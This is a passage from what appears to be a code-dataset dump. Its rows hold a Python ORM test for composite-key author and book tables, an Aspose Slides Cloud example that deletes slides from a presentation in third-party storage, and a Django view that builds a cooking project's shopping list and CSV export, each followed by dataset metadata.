CREATE TABLE ascetic_composite_author (
id integer NOT NULL,
lang VARCHAR(6) NOT NULL,
first_name VARCHAR(40) NOT NULL,
last_name VARCHAR(40) NOT NULL,
bio TEXT,
PRIMARY KEY (id, lang)
);
DROP TABLE IF EXISTS ascetic_composite_book CASCADE;
CREATE TABLE ascetic_composite_book (
id integer NOT NULL,
lang VARCHAR(6) NOT NULL,
title VARCHAR(255),
author_id integer,
PRIMARY KEY (id, lang),
FOREIGN KEY (author_id, lang) REFERENCES ascetic_composite_author (id, lang) ON DELETE CASCADE
);
""",
'mysql': """
DROP TABLE IF EXISTS ascetic_composite_author CASCADE;
CREATE TABLE ascetic_composite_author (
id INT(11) NOT NULL,
lang VARCHAR(6) NOT NULL,
first_name VARCHAR(40) NOT NULL,
last_name VARCHAR(40) NOT NULL,
bio TEXT,
PRIMARY KEY (id, lang)
);
DROP TABLE IF EXISTS ascetic_composite_book CASCADE;
CREATE TABLE ascetic_composite_book (
id INT(11) NOT NULL,
lang VARCHAR(6) NOT NULL,
title VARCHAR(255),
author_id INT(11),
PRIMARY KEY (id, lang),
FOREIGN KEY (author_id, lang) REFERENCES ascetic_composite_author (id, lang)
);
""",
'sqlite3': """
DROP TABLE IF EXISTS ascetic_composite_author;
CREATE TABLE ascetic_composite_author (
id INTEGER NOT NULL,
lang VARCHAR(6) NOT NULL,
first_name VARCHAR(40) NOT NULL,
last_name VARCHAR(40) NOT NULL,
bio TEXT,
PRIMARY KEY (id, lang)
);
DROP TABLE IF EXISTS ascetic_composite_book;
CREATE TABLE ascetic_composite_book (
id INTEGER NOT NULL,
lang VARCHAR(6) NOT NULL,
title VARCHAR(255),
author_id INT(11),
PRIMARY KEY (id, lang),
FOREIGN KEY (author_id, lang) REFERENCES ascetic_composite_author (id, lang)
);
"""
}
@classmethod
def create_models(cls):
class Author(Model):
class Mapper(object):
db_table = 'ascetic_composite_author'
defaults = {'bio': 'No bio available'}
validations = {'first_name': validators.Length(),
'last_name': (validators.Length(), lambda x: x != 'BadGuy!' or 'Bad last name', )}
class Book(Model):
author = ForeignKey(Author, related_field=('id', 'lang'), field=('author_id', 'lang'), related_name='books')
class Mapper(object):
db_table = 'ascetic_composite_book'
return locals()
@classmethod
def setUpClass(cls):
db = databases['default']
db.cursor().execute(cls.create_sql[db.engine])
for model_name, model in cls.create_models().items():
globals()[model_name] = model
def setUp(self):
db = databases['default']
db.identity_map.disable()
for table in ('ascetic_composite_author', 'ascetic_composite_book'):
db.execute('DELETE FROM {0}'.format(db.qn(table)))
def test_model(self):
author = Author(
id=1,
lang='en',
first_name='First name',
last_name='Last name',
)
self.assertIn('first_name', dir(author))
self.assertIn('last_name', dir(author))
author.save()
author_pk = (1, 'en')
author = Author.get(author_pk)
self.assertEqual(author.pk, author_pk)
book = Book(
id=5,
lang='en',
title='Book title'
)
book.author = author
book.save()
book_pk = (5, 'en')
book = Book.get(book_pk)
self.assertEqual(book.pk, book_pk)
self.assertEqual(book.author.pk, author_pk)
author = Author.get(author_pk)
self.assertEqual(author.books[0].pk, book_pk)
| mit | 7,920,552,640,540,147,000 | 33.277372 | 120 | 0.525128 | false | 4.304308 | false | false | false |
aspose-slides/Aspose.Slides-for-Cloud | Examples/Python/DeleteAllSlidesFromPowerPointPresentationThirdPartyStorage.py | 2 | 1567 | import asposeslidescloud
from asposeslidescloud.SlidesApi import SlidesApi
from asposeslidescloud.SlidesApi import ApiException
import asposestoragecloud
from asposestoragecloud.StorageApi import StorageApi
from asposestoragecloud.StorageApi import ResponseMessage
apiKey = "XXXXX" #sepcify App Key
appSid = "XXXXX" #sepcify App SID
apiServer = "http://api.aspose.com/v1.1"
data_folder = "../../../data/"
#Instantiate Aspose Storage API SDK
storage_apiClient = asposestoragecloud.ApiClient.ApiClient(apiKey, appSid, True)
storageApi = StorageApi(storage_apiClient)
#Instantiate Aspose Slides API SDK
api_client = asposeslidescloud.ApiClient.ApiClient(apiKey, appSid, True)
slidesApi = SlidesApi(api_client);
#set input file name
name = "sample-input.pptx"
storage = "AsposeDropboxStorage"
try:
#upload file to 3rd party cloud storage
response = storageApi.PutCreate(name, data_folder + name, storage=storage)
#invoke Aspose.Slides Cloud SDK API to delete all slides from a presentation
response = slidesApi.DeleteSlidesCleanSlidesList(name, storage=storage)
if response.Status == "OK":
#download presentation from 3rd party cloud storage
response = storageApi.GetDownload(Path=name, storage=storage)
outfilename = "c:/temp/" + name
with open(outfilename, 'wb') as f:
for chunk in response.InputStream:
f.write(chunk)
except ApiException as ex:
print "ApiException:"
print "Code:" + str(ex.code)
print "Message:" + ex.message
| mit | -7,580,811,026,189,730,000 | 34.613636 | 80 | 0.72559 | false | 3.482222 | false | false | false |
blacksph3re/alastair | cooking/shopping_list/shopping_list.py | 1 | 7304 | import math
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Submit, Button, Field, Hidden, HTML, Div
from crispy_forms.bootstrap import FormActions, AppendedText, StrictButton, InlineField
from django import forms
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import resolve, reverse
from django.db import models
from django.db.models import F, ExpressionWrapper, FloatField, IntegerField, CharField, Case, When, Sum, Func, Min, Q
from django.shortcuts import render, redirect
from django.utils.encoding import python_2_unicode_compatible
from cooking.helpers import prepareContext
from cooking.models import Ingredient
from cooking.inventory.inventory import inventory_data, add_to_inventory
def project_shopping_list_data(proj):
return Ingredient.objects.filter(receipe__meal__project=proj).annotate(
# Copy ri.measurement for easier access
measurement=F('receipe_ingredient__measurement'),
# Also copy ri.remarks for easier access
mr_remarks=F('receipe_ingredient__remarks'),
# Exact price = (mr.person_count / r.default_person_count) * i.price
exact_price_tmp=ExpressionWrapper((F('receipe__meal_receipe__person_count') / F('receipe__default_person_count')) * F('price'), output_field=FloatField()),
exact_amount_tmp=Case(
When(buying_measurement=F('receipe_ingredient__measurement'),
then=(F('receipe_ingredient__amount') / F('receipe__default_person_count')) * F('receipe__meal_receipe__person_count')),
When(calculation_measurement=F('receipe_ingredient__measurement'),
then=(((F('receipe_ingredient__amount') / F('calculation_quantity')) * F('buying_quantity')) / F('receipe__default_person_count')) * F('receipe__meal_receipe__person_count')),
default=0,
output_field=FloatField()),
exact_calculation_amount_tmp=Case(
When(calculation_measurement__isnull=True,
then=None),
When(buying_measurement=F('receipe_ingredient__measurement'),
then=(((F('receipe_ingredient__amount') / F('buying_quantity')) * F('calculation_quantity')) / F('receipe__default_person_count')) * F('receipe__meal_receipe__person_count')),
When(calculation_measurement=F('receipe_ingredient__measurement'),
then=(F('receipe_ingredient__amount') / F('receipe__default_person_count')) * F('receipe__meal_receipe__person_count')),
default=None,
output_field=FloatField()),
).annotate(
exact_amount=Sum('exact_amount_tmp'),
first_occurrence=Min('receipe__meal__time'),
).annotate(
exact_calculation_amount=Case(When(calculation_measurement__isnull=False, then=F('exact_amount') / F('buying_quantity') * F('calculation_quantity')),
default=None,
output_field=FloatField()),
exact_buying_count=(F('exact_amount') / F('buying_quantity')),
buying_count=Func((F('exact_amount') / F('buying_quantity')) + 0.5, function='ROUND'),
).annotate(
effective_amount=F('buying_count') * F('buying_quantity'),
effective_calculation_amount=F('buying_count') * F('calculation_quantity'),
effective_price=ExpressionWrapper(F('buying_count') * F('price'), output_field=FloatField()),
#).values('first_occurrence', 'name', 'id', 'buying_measurement', 'buying_quantity', 'calculation_measurement', 'calculation_quantity', 'exact_amount', 'exact_calculation_amount', 'effective_amount', 'effective_calculation_amount', 'remarks', 'effective_price', 'buying_count', 'price'
)
def subtract_inventory(proj, shopping_list):
inventory = list(inventory_data(proj))
sl = list(shopping_list)
for item in sl:
for inv in (x for x in inventory if x.ingredient.id == item.id):
# Subtract the buying count
item.exact_buying_count -= inv.exact_buying_count
#print('Subtracting ' + str(inv.amount) + inv.measurement + ' from ' + item.name)
#inventory.remove(inv) # for optimization remove this element
# Recalculate all the other properties
# I most propably forgot something here
item.exact_amount = item.exact_buying_count * item.buying_quantity
if(item.calculation_measurement):
item.exact_calculation_amount = item.exact_buying_count * item.calculation_quantity
item.buying_count = math.ceil(item.exact_buying_count)
item.effective_amount = item.buying_count * item.buying_quantity
if(item.calculation_measurement):
item.effective_calculation_amount = item.buying_count * item.calculation_quantity
item.effective_price = item.buying_count * float(item.price)
return [x for x in sl if x.exact_buying_count > 0.000001]
@login_required
def project_shopping_list(request):
context = prepareContext(request)
if('active_project' not in context):
return redirect('cooking:projects')
if('activate_inventory' in request.GET):
request.session['inventory_active'] = True
elif('deactivate_inventory' in request.GET):
request.session['inventory_active'] = False
elif('inventory_active' not in request.session):
request.session['inventory_active'] = True
if(request.session['inventory_active']):
if('send_to_inventory' in request.GET):
sl = project_shopping_list_data(context['active_project'])
sl = subtract_inventory(context['active_project'], sl)
for item in sl:
add_to_inventory(context['active_project'], item)
context['shopping_list'] = project_shopping_list_data(context['active_project'])
if(request.session['inventory_active']):
context['shopping_list'] = subtract_inventory(context['active_project'], context['shopping_list'])
#context['total_exact_price'] = context['shopping_list'].aggregate(tp=Sum('exact_price')).get('tp')
context['total_effective_price'] = sum([float(x.effective_price) for x in context['shopping_list']])
context['pagetitle'] = 'Shopping List'
context['inventory_active'] = request.session['inventory_active']
return render(request, 'listings/shopping_list.html', context)
@login_required
def project_shopping_list_csv(request):
context = prepareContext(request)
if('active_project' not in context):
return redirect('cooking:projects')
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="shoppinglist.csv"'
writer = UnicodeWriter(response)
writer.writerow(['First Use', 'Ingredient', 'Exact Amount 1', '', 'Exact Amount 2', '', 'Effective Amount 1', '', 'Effective Amount 2', '', 'Buying Count', 'Effective Price', 'Remarks'])
if('inventory_active' not in request.session):
request.session['inventory_active'] = True
shoppinglist = project_shopping_list_data(context['active_project'])
if(request.session['inventory_active']):
shoppinglist = subtract_inventory(context['active_project'], shoppinglist)
for item in shoppinglist:
if(item.exact_amount > 0):
writer.writerow([item.first_occurrence,
item.name,
item.exact_amount,
conv_measurement(item.buying_measurement, item.exact_amount),
item.exact_calculation_amount,
conv_measurement(item.calculation_measurement, item.exact_calculation_amount),
item.effective_amount,
conv_measurement(item.buying_measurement, item.effective_amount),
item.effective_calculation_amount,
conv_measurement(item.calculation_measurement, item.effective_calculation_amount),
item.buying_count,
item.effective_price,
item.remarks])
return response
| gpl-2.0 | -7,200,600,426,151,556,000 | 49.722222 | 287 | 0.730559 | false | 3.378353 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.